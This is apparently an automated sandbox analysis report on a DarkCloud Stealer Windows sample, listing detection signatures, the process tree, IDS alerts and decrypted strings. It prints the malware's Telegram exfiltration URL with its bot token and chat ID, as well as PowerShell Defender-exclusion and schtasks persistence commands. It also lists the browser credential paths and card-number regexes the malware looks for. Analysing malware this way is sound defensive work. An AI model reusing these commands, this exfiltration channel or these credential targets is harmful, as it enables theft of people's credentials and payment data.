Edit tour

Windows Analysis Report
yMvZXcwN2OdoP6x.exe

Overview

General Information

Sample name:	yMvZXcwN2OdoP6x.exe
Analysis ID:	1567400
MD5:	936823354ce6b1d705e73fea6784b33e
SHA1:	6116d95d45565cc8a82b5cd49f505c8717d37852
SHA256:	71a2d3cf903f921cc65fbcdde44707d22939e8c1d520a3a4d80e06985bcdf7a5
Tags:	exeuser-abuse_ch
Infos:

Detection

DarkCloud

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected DarkCloud

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Writes or reads registry keys via WMI

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to retrieve information about pressed keystrokes

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

yMvZXcwN2OdoP6x.exe (PID: 5780 cmdline: "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe" MD5: 936823354CE6B1D705E73FEA6784B33E)

powershell.exe (PID: 6392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjlEiSlJe.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7232 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmpFFDD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

yMvZXcwN2OdoP6x.exe (PID: 7388 cmdline: "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe" MD5: 936823354CE6B1D705E73FEA6784B33E)

LjlEiSlJe.exe (PID: 7584 cmdline: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe MD5: 936823354CE6B1D705E73FEA6784B33E)

schtasks.exe (PID: 7692 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmp18B4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

LjlEiSlJe.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Roaming\LjlEiSlJe.exe" MD5: 936823354CE6B1D705E73FEA6784B33E)

WmiPrvSE.exe (PID: 7804 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkCloud Stealer	Stealer is written in Visual Basic.	No Attribution	https://asec.ahnlab.com/en/53128/ https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/	https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

Malware Configuration

Threatname: DarkCloud

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendMessage?chat_id=6732456666"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
00000000.00000002.2103476200.0000000003767000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
00000000.00000002.2103476200.0000000003767000.00000004.00000800.00020000.00000000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x533c:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB 0x7735c:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB 0xe837c:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000B.00000002.2163631105.0000000003947000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0000000B.00000002.2163631105.0000000003947000.00000004.00000800.00020000.00000000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x5994:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB 0x779b4:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB 0xe89d4:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Process Memory Space: yMvZXcwN2OdoP6x.exe PID: 5780	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Process Memory Space: yMvZXcwN2OdoP6x.exe PID: 5780	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: yMvZXcwN2OdoP6x.exe PID: 7388	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Process Memory Space: LjlEiSlJe.exe PID: 7584	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Process Memory Space: LjlEiSlJe.exe PID: 7584	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
11.2.LjlEiSlJe.exe.39b9bc8.3.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0.2.yMvZXcwN2OdoP6x.exe.37d9570.3.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
9.2.yMvZXcwN2OdoP6x.exe.400000.0.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
11.2.LjlEiSlJe.exe.39914e0.2.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
11.2.LjlEiSlJe.exe.39b9bc8.3.raw.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
11.2.LjlEiSlJe.exe.3947ba8.5.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0.2.yMvZXcwN2OdoP6x.exe.3767550.4.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
11.2.LjlEiSlJe.exe.39914e0.2.raw.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0.2.yMvZXcwN2OdoP6x.exe.37d9570.3.raw.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0.2.yMvZXcwN2OdoP6x.exe.3767550.4.raw.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
11.2.LjlEiSlJe.exe.3947ba8.5.raw.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Click to see the 8 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe", ParentImage: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe, ParentProcessId: 5780, ParentProcessName: yMvZXcwN2OdoP6x.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe", ProcessId: 6392, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmp18B4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmp18B4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe, ParentImage: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe, ParentProcessId: 7584, ParentProcessName: LjlEiSlJe.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmp18B4.tmp", ProcessId: 7692, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmpFFDD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmpFFDD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe", ParentImage: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe, ParentProcessId: 5780, ParentProcessName: yMvZXcwN2OdoP6x.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmpFFDD.tmp", ProcessId: 7232, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe", ParentImage: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe, ParentProcessId: 5780, ParentProcessName: yMvZXcwN2OdoP6x.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe", ProcessId: 6392, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmpFFDD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmpFFDD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe", ParentImage: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe, ParentProcessId: 5780, ParentProcessName: yMvZXcwN2OdoP6x.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmpFFDD.tmp", ProcessId: 7232, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE DarkCloud Stealer File Grabber Function Exfiltrating Data via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T14:27:40.498169+0100	2044741	1	A Network Trojan was detected	192.168.2.5	49732	149.154.167.220	443	TCP
2024-12-03T14:27:41.199005+0100	2044741	1	A Network Trojan was detected	192.168.2.5	49733	149.154.167.220	443	TCP

ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T14:27:59.754705+0100	2045300	1	A Network Trojan was detected	192.168.2.5	49773	149.154.167.220	443	TCP
2024-12-03T14:28:00.317889+0100	2045300	1	A Network Trojan was detected	192.168.2.5	49774	149.154.167.220	443	TCP
2024-12-03T14:28:17.736760+0100	2045300	1	A Network Trojan was detected	192.168.2.5	49816	149.154.167.220	443	TCP
2024-12-03T14:28:17.902969+0100	2045300	1	A Network Trojan was detected	192.168.2.5	49817	149.154.167.220	443	TCP
2024-12-03T14:28:30.937992+0100	2045300	1	A Network Trojan was detected	192.168.2.5	49848	149.154.167.220	443	TCP
2024-12-03T14:28:31.718871+0100	2045300	1	A Network Trojan was detected	192.168.2.5	49850	149.154.167.220	443	TCP
2024-12-03T14:28:41.936651+0100	2045300	1	A Network Trojan was detected	192.168.2.5	49875	149.154.167.220	443	TCP
2024-12-03T14:28:42.433585+0100	2045300	1	A Network Trojan was detected	192.168.2.5	49879	149.154.167.220	443	TCP
2024-12-03T14:28:51.764275+0100	2045300	1	A Network Trojan was detected	192.168.2.5	49900	149.154.167.220	443	TCP
2024-12-03T14:28:52.534495+0100	2045300	1	A Network Trojan was detected	192.168.2.5	49903	149.154.167.220	443	TCP
2024-12-03T14:29:01.045678+0100	2045300	1	A Network Trojan was detected	192.168.2.5	49925	149.154.167.220	443	TCP
2024-12-03T14:29:01.832425+0100	2045300	1	A Network Trojan was detected	192.168.2.5	49927	149.154.167.220	443	TCP
2024-12-03T14:29:10.390995+0100	2045300	1	A Network Trojan was detected	192.168.2.5	49949	149.154.167.220	443	TCP
2024-12-03T14:29:11.999491+0100	2045300	1	A Network Trojan was detected	192.168.2.5	49953	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T14:27:31.708316+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49709	162.55.60.2	80	TCP
2024-12-03T14:27:31.803245+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49711	162.55.60.2	80	TCP

ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T14:27:39.818526+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49732	149.154.167.220	443	TCP
2024-12-03T14:27:40.584073+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49733	149.154.167.220	443	TCP
2024-12-03T14:27:53.085683+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49758	149.154.167.220	443	TCP
2024-12-03T14:27:54.282756+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49761	149.154.167.220	443	TCP
2024-12-03T14:27:59.119827+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49773	149.154.167.220	443	TCP
2024-12-03T14:27:59.720164+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49774	149.154.167.220	443	TCP
2024-12-03T14:28:11.369694+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49802	149.154.167.220	443	TCP
2024-12-03T14:28:11.818559+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49804	149.154.167.220	443	TCP
2024-12-03T14:28:17.078156+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49816	149.154.167.220	443	TCP
2024-12-03T14:28:17.321368+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49817	149.154.167.220	443	TCP
2024-12-03T14:28:24.787500+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49834	149.154.167.220	443	TCP
2024-12-03T14:28:25.216955+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49836	149.154.167.220	443	TCP
2024-12-03T14:28:30.261640+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49848	149.154.167.220	443	TCP
2024-12-03T14:28:31.006816+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49850	149.154.167.220	443	TCP
2024-12-03T14:28:35.608050+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49861	149.154.167.220	443	TCP
2024-12-03T14:28:36.499499+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49864	149.154.167.220	443	TCP
2024-12-03T14:28:41.171008+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49875	149.154.167.220	443	TCP
2024-12-03T14:28:41.800630+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49879	149.154.167.220	443	TCP
2024-12-03T14:28:45.191433+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49884	149.154.167.220	443	TCP
2024-12-03T14:28:46.143363+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49889	149.154.167.220	443	TCP
2024-12-03T14:28:50.943844+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49900	149.154.167.220	443	TCP
2024-12-03T14:28:51.837263+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49903	149.154.167.220	443	TCP
2024-12-03T14:28:54.820932+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49909	149.154.167.220	443	TCP
2024-12-03T14:28:55.582141+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49913	149.154.167.220	443	TCP
2024-12-03T14:29:00.386632+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49925	149.154.167.220	443	TCP
2024-12-03T14:29:01.178006+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49927	149.154.167.220	443	TCP
2024-12-03T14:29:04.119907+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49935	149.154.167.220	443	TCP
2024-12-03T14:29:05.492173+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49938	149.154.167.220	443	TCP
2024-12-03T14:29:09.732230+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49949	149.154.167.220	443	TCP
2024-12-03T14:29:11.136081+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49953	149.154.167.220	443	TCP
2024-12-03T14:29:15.026286+0100	2852388	1	Malware Command and Control Activity Detected	192.168.2.5	49962	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 11.2.LjlEiSlJe.exe.3947ba8.5.raw.unpack

Malware Configuration Extractor: DarkCloud {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendMessage?chat_id=6732456666"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: yMvZXcwN2OdoP6x.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: yMvZXcwN2OdoP6x.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Cookies
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Password
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \Default\Login Data
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \Login Data
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Password :
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: //setting[@name='Password']/value
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: SMTP Email Address
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: NNTP Email Address
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Email
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: HTTPMail User Name
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: HTTPMail Server
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^389[0-9]{11}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^3[47][0-9]{13}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(6541\|6556)[0-9]{12}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^3(?:0[0-5]\|[68][0-9])[0-9]{11}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^63[7-9][0-9]{13}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(?:2131\|1800\|35\\d{3})\\d{11}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^9[0-9]{15}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(6304\|6706\|6709\|6771)[0-9]{12,15}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(5018\|5020\|5038\|6304\|6759\|6761\|6763)[0-9]{8,15}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Foxmail.exe
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Mastercard
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(6334\|6767)[0-9]{12}\|(6334\|6767)[0-9]{14}\|(6334\|6767)[0-9]{15}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{12}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{14}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{15}\|564182[0-9]{10}\|564182[0-9]{12}\|564182[0-9]{13}\|633110[0-9]{10}\|633110[0-9]{12}\|633110[0-9]{13}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(62[0-9]{14,17})$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Visa Card
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?\|5[1-5][0-9]{14})$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Visa Master Card
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \logins.json
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \signons.sqlite
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: mail\
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \AccCfg\Accounts.tdat
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: EnableSignature
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Application : FoxMail
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: encryptedUsername
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: logins
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: encryptedPassword
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Select * from Win32_ComputerSystem
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \Cookies
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \Default\Cookies
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \cookies.sqlite
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \cookies.db
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \global-messages-db.sqlite
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: C:\\MailMasterData
